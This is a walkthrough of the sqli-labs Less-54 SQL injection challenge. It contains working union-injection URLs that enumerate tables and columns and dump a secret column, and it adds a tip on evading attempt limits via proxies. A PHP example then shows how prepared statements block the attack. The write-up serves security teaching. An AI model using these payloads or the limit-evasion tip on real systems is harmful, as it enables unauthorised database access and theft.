Sqli-labs Less-54: union injection with 10 attempts

Starting with this level, we enter Page 4, Challenges. This is mainly a series of advanced exercises that make deeper use of the knowledge learned earlier. This level still tests character-type (string) injection, but allows only ten attempts, so you need to think before each try about how to keep the number of attempts down. The table name and password are forcibly replaced after every ten attempts.

The SQL statement for this level is:

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

Because the database name, challenges, is already known, we need to find the table name.

http://127.0.0.1/sql/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

The table is named hcuhv04r8w (yours will not be this when you test). The next step is to find all the columns in the table.

http://127.0.0.1/sql/Less-54/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='hcuhv04r8w'--+

Now we have all the columns. You could view all of the data, but here we know the password is in the secret_PGN8 column, so we look at the contents of that column directly.

http://127.0.0.1/sql/Less-54/?id=-1' union select 1,2,group_concat(secret_PGN8) from challenges.hcuhv04r8w--+

Submit the password. The page shows the prompt "congrats you nailed it": success.

In fact, in actual penetration testing, we can change the IP (a proxy can be considered) or change the browser, etc., depending on what the server side uses to enforce the limit.
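The statement above is injectable because $id is concatenated into the SQL text. The following added example (not part of the original post or of sqli-labs) runs the level's query next to a prepared-statement version of it, using the third request's value as input. Assumptions: SQLite in-memory databases attached as security and challenges stand in for MySQL, the function names are hypothetical, and the rows and secret value are constructed.

```php
<?php
// Added example, not sqli-labs code. SQLite in-memory databases stand in for
// MySQL so the script runs offline; rows and the secret value are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("ATTACH DATABASE ':memory:' AS security");
$db->exec("ATTACH DATABASE ':memory:' AS challenges");
$db->exec("CREATE TABLE security.users (id INTEGER, username TEXT, password TEXT)");
$db->exec("INSERT INTO security.users VALUES (1, 'Dumb', 'Dumb')");
$db->exec("CREATE TABLE challenges.hcuhv04r8w (id INTEGER, secret_PGN8 TEXT)");
$db->exec("INSERT INTO challenges.hcuhv04r8w VALUES (1, 'constructed-secret')");

// Hypothetical name. This is the level's statement: $id becomes part of the
// SQL text, so a quote in $id ends the string literal and the rest is parsed
// as SQL.
function lookup_concatenated(PDO $db, string $id): array
{
    $sql = "SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hypothetical name. Same query with a placeholder: the driver sends $id as a
// bound value, so it is only ever compared with the id column.
function lookup_bound(PDO $db, string $id): array
{
    $stmt = $db->prepare("SELECT * FROM security.users WHERE id = ? LIMIT 0,1");
    $stmt->execute([$id]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Value of the id parameter from the third request above ("--+" decodes to "-- ").
$payload = "-1' union select 1,2,group_concat(secret_PGN8) from challenges.hcuhv04r8w-- ";

foreach (['1', $payload] as $id) {
    echo "id = $id\n";
    echo "  concatenated: " . json_encode(lookup_concatenated($db, $id)) . "\n";
    echo "  bound:        " . json_encode(lookup_bound($db, $id)) . "\n";
}
```

For id 1 both functions return the same user row. For the injected value the concatenated query returns the contents of the secret column, while the bound query returns no rows.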

Origin www.cnblogs.com/zhengna/p/12667686.html